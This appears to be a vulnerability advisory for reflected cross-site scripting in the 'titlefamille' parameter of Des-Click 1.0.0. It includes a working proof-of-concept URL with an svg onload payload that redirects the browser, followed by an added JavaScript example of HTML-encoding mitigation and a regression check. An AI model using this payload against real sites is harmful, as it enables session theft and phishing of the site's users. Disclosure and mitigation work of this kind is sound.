# Title: Des-Click 1.0.0 - Reflective Cross-Site Scripting
# Date: 2020-02-09
# Author: Mizaru
# Vendor Homepage: https://www.des-click.com/
# Tested on: Windows 10 / Linux
# Versions: 1.0.0
# Vulnerable Parameter: "titlefamille" (Get Method)
# CVE: None
# Notes:
# An attacker can use XSS (in the titlefamille parameter of Des-Click 1.0.0)
# to send a malicious script to an unsuspecting admin or user. The
# admin's or user's browser has no way to know that the script should not
# be trusted (Same Origin Policy), and will execute the script. Because the browser treats the script as coming
# from a trusted source, the malicious script can access any cookies, session
# tokens, or other sensitive information retained by the browser and used
# with that site. These scripts can even rewrite the content of the HTML
# page. An attacker can also easily use this vulnerability to social-engineer
# users and create a fake field.
# PoC:
# Go to the page through this path: http://localhost/id_famille=1&id_grp=1&titlefamille=
# Add the "titlefamille" parameter to the URL and write malicious code. Example:
http://localhost/id_famille=1&id_grp=1&titlefamille="><svg/onload=document.location.href="https://github.com/sMizaru">
# This code will redirect you to my GitHub page.
# Some malicious code will be detected by the WAF of the web application (if the server has a WAF).
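# Mitigation example (added here, not part of the original advisory or of Des-Click's code):
# HTML-encoding "titlefamille" at the point of output keeps the PoC value inside the attribute.
# The <input> template and all function names are assumptions; the advisory does not show the application's markup.

```javascript
// Added example. Assumption: the <input> template is hypothetical; the
// advisory does not show where Des-Click echoes "titlefamille".

// Value of "titlefamille" taken from the advisory's PoC URL.
const POC_VALUE = '"><svg/onload=document.location.href="https://github.com/sMizaru">';

// Encode the characters that can close an attribute value or open a tag.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Before: the parameter is echoed as-is into value="...".
function renderVulnerable(titlefamille) {
  return `<input name="titlefamille" value="${titlefamille}">`;
}

// After: the parameter is HTML-encoded where it is written into the page.
function renderHardened(titlefamille) {
  return `<input name="titlefamille" value="${escapeHtml(titlefamille)}">`;
}

// Isolate what the template emitted in place of the parameter by rendering
// a harmless marker first to learn the surrounding prefix and suffix.
function reflectedSegment(render, value) {
  const marker = 'REFLECTMARKER';
  const [prefix, suffix] = render(marker).split(marker);
  const out = render(value);
  return out.slice(prefix.length, out.length - suffix.length);
}

// Regression check: inside a double-quoted attribute, the reflected text
// must not contain a raw quote or angle bracket.
function staysInAttribute(render, value) {
  return !/["<>]/.test(reflectedSegment(render, value));
}

console.log('vulnerable template safe?', staysInAttribute(renderVulnerable, POC_VALUE));
console.log('hardened template safe?  ', staysInAttribute(renderHardened, POC_VALUE));
console.log(renderHardened(POC_VALUE));
```

# The same staysInAttribute check can be run against any template function in a test suite so a later change that drops the encoding is caught.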
#Big thanks to Smog (https://twitter.com/Sm0g3uh)